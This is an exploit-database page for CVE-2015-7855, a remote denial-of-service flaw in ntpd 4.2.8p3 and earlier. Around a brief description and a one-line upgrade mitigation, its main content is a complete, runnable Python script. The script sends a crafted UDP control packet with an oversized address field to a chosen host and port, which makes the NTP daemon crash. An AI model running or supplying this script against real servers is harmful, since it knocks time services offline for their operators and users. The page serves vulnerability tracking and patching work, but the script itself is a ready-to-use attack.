header-logo
Suggest Exploit
vendor:
ntpd
by:
Magnus Klaaborg Stubman
6,5
CVSS
MEDIUM
Denial of Service (DoS)
400
CWE
Product Name: ntpd
Affected Version From: All ntp-4 releases up to, but not including 4.2.8p4, and 4.3.0 up to, but not including 4.3.77
Affected Version To: All ntp-4 releases up to, but not including 4.2.8p4, and 4.3.0 up to, but not including 4.3.77
Patch Exists: YES
Related CWE: CVE-2015-7855
CPE: N/A
Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2015-7855/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp3-cve-2015-7855/https://www.rapid7.com/db/vulnerabilities/ntp-cve-2015-7855/https://www.rapid7.com/db/vulnerabilities/ibm-aix-cve-2015-7855/https://www.rapid7.com/db/vulnerabilities/aix-7.1.0-ntp_advisory4_cve-2015-7855/https://www.rapid7.com/db/vulnerabilities/aix-6.1.6-ntp_advisory4_cve-2015-7855/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2015-7855/https://www.rapid7.com/db/vulnerabilities/cisco-xe-cve-2015-7855/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2015-7855/https://www.rapid7.com/db/vulnerabilities/aix-7.2.0-ntp_advisory4_cve-2015-7855/https://www.rapid7.com/db/vulnerabilities/aix-6.1.9-ntp_advisory4_cve-2015-7855/https://www.rapid7.com/db/vulnerabilities/aix-7.1.4-ntp_advisory4_cve-2015-7855/https://www.rapid7.com/db/vulnerabilities/aix-5.3.12-ntp_advisory4_cve-2015-7855/https://www.rapid7.com/db/vulnerabilities/aix-7.1.3-ntp_advisory4_cve-2015-7855/https://www.rapid7.com/db/vulnerabilities/debian-cve-2015-7851/https://www.rapid7.com/db/vulnerabilities/suse-cve-2015-7691/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2015-5195/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2015-5194/https://www.rapid7.com/db/vulnerabilities/debian-cve-2015-7855/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2015-7852/https://www.rapid7.com/db/?q=CVE-2015-7855&type=&page=2https://www.rapid7.com/db/?q=CVE-2015-7855&type=&page=3https://www.rapid7.com/db/?q=CVE-2015-7855&type=&page=4https://www.rapid7.com/db/?q=CVE-2015-7855&type=&page=2
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2015

ntpd 4.2.8p3 remote DoS

This exploit is a remote denial of service (DoS) attack against ntpd 4.2.8p3. It sends a specially crafted packet to the ntpd server, which causes it to crash. The packet contains a nonce value that is too large for the server to handle, causing it to crash.

Mitigation:

Upgrade to ntpd 4.2.8p4 or later, or 4.3.77 or later.
Source

Exploit-DB raw data:

#!/usr/bin/env python

# Exploit Title: ntpd 4.2.8p3 remote DoS
# Date: 2015-10-21
# Bug Discovery: John D "Doug" Birdwell
# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
# Website: http://support.ntp.org/bin/view/Main/NtpBug2922
# Vendor Homepage: http://www.ntp.org/
# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p3.tar.gz
# Version: All ntp-4 releases up to, but not including 4.2.8p4, and 4.3.0 up to, but not including 4.3.77
# CVE: CVE-2015-7855

import sys
import socket

if len(sys.argv) != 3:
    print "usage: " + sys.argv[0] + " <host> <port>"
    sys.exit(-1)

payload = "\x16\x0a\x00\x02\x00\x00\x00\x00\x00\x00\x00\xa0\x6e\x6f\x6e\x63\x65\x3d\x64\x61\x33\x64\x35\x64\x30\x66\x66\x38\x30\x38\x31\x65\x63\x38\x33\x35\x32\x61\x32\x32\x38\x36\x2c\x20\x66\x72\x61\x67\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39"

print "[-] Sending payload to " + sys.argv[1] + ":" + sys.argv[2] + " ..."
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], int(sys.argv[2])))
print "[+] Done!"

Navigation

Suggest Exploit

Services By CQR